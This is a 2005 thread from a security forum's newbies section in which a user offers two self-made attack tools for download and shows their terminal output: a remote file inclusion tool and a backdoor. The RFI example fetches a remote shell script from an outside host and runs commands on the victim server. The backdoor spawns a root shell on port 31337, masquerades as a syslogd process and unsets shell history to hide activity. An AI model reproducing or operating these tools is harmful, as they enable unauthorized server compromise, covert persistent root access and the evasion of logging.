Waraxe IT Security Portal
Login or Register
January 14, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 164
Members: 0
Total: 164
Full disclosure
Defense in depth -- the Microsoft way (part 95): the (shared)"Start Menu" is dispensable
Re: Multiple Security Misconfigurations and CustomerEnumeration Exposure in Convercent Whistleblowing Platform(EQS Group)
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in tapslip6 Utility via Unbounded Device Path Construction
TinyOS 2.1.2 Stack-Based Buffer Overflow in mcp2200gpio
TinyOS 2.1.2 printfUART Global Buffer Overflow via UnboundedFormat Expansion
KL-001-2026-01: yintibao Fun Print Mobile Unauthorized Access via Context Hijacking
Multiple Security Misconfigurations and Customer Enumeration Exposure in Convercent Whistleblowing Platform (EQS Group)
Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
Panda3d v1.10.16 egg-mkfont Stack Buffer Overflow
Panda3d v1.10.16 deploy-stub Unbounded Stack Allocation Leading to Uninitialized Memory
MongoDB v8.3.0 Integer Underflow in LMDB mdb_load
Bioformats v8.3.0 Untrusted Deserialization of Bio-Formats Memoizer Cache Files
Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser
MongoDB v8.3.0 Heap Buffer Underflow in OpenLDAP LMDB mdb_load
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> 2 stupid programs but useful
Post new topicReply to topic View previous topic :: View next topic
2 stupid programs but useful
PostPosted: Sat Apr 16, 2005 2:59 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




jajaj ok i know most of u r going to say that is lame mmm but well trying coding one...
Peace


NST-RFITool
Code:
/*
Name: NST-RFITool v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN <hck_zatan@hotmail.com>
Date: 02/04/05
Description: RFI Tool as well. Remote :) With shell :) =)

root@NeoSecurity:/home/hackzatan# ./NST-RFITool
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
[+] Usage: ./NST-RFITool <Host> <Archivo_Rfi> <cmd> <Shell_or_Command>
[+] example: ./NST-RFITool localhost /index.php "?&cmd=" "http://host.com/shell.gif"
[+] http://localhost/index.php?&cmd=id
['] Or you could use
[+] http://localhost/index.php?&cmd=http://host.com/shell.gif
root@NeoSecurity:/home/hackzatan# ./NST-RFITool localhost /index.php "?&cmd=" "http://saure.lithyum.org/0/cmd.gif?&cmd="
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
Starting NST-Shell...
(ctrl+c to exit)
Connecting localhost:80

NShell> id;uname -a;uptime;ls

uid=99(nobody) gid=98(nobody) groups=98(nobody)
Linux NeoSecurity 2.4.29 #6 Thu Jan 20 16:30:37 PST 2005 i686 unknown unknown GNU/Linux
21:40:51 up 11:33, 1 user, load average: 0.00, 0.02, 0.00
apache_pb.gif
index.php
END
NShell>
root@NeoSecurity:/home/hackzatan#

Under GPL
I accept no responsibilty for any damage caused by it.
Additons and fixes always welcome.
*/



NST-Backdoor
Code:
/*
Name: NST-Backdoor v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN
Date: 31/03/05 17:51
Description: Backdoor!!

root@NeoSecurity:/home/hackzatan# pico NST-Backdoor.c
root@NeoSecurity:/home/hackzatan# gcc NST-Backdoor.c -o NST-Backdoor
root@NeoSecurity:/home/hackzatan# ./NST-Backdooor
[+] NST-Backdoor v0.1 by HaCkZaTaN
[+] NeoSecurity
[*] Usage: ./NST-Backdoor <port>
root@NeoSecurity:/home/hackzatan# ./NST-Backdoor 31337
[+] NST-Backdoor v0.1 by HaCkZaTaN
[*] Connecting...
[*] Spawning Shell on port 31337. PID is 1887.
root@NeoSecurity:/home/hackzatan# ps -aux | grep syslogd-nst
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1888 0.0 0.5 1256 344 pts/0 S 18:46 0:00 syslogd-nst oor 31337
root@NeoSecurity:/home/hackzatan# telnet localhost 31337
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
NST-Backdoor v0.1 - Have a lot of fun..
"export TERM=xterm; unset HISTFILE; unset SAVEHIST"sh-3.00#
sh-3.00# sh-3.00# export TERM=xterm; unset HISTFILE; unset SAVEHIST
sh-3.00# sh-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-3.00# sh-3.00#

*/
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:40 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




where was the code ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 5:50 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




There is a link You dont see iit Smile

Well i post it again is in .rar

NST-RFITool

NST-Backdoor

Peace
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 6:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




sorry bout that,
coz i just see you put a detailed how to use it in "[code]" place ,n it would be great if u put the real code in "[code]" place, so we could see a source code.

but its oke

peace too

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
2 stupid programs but useful
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.055 Seconds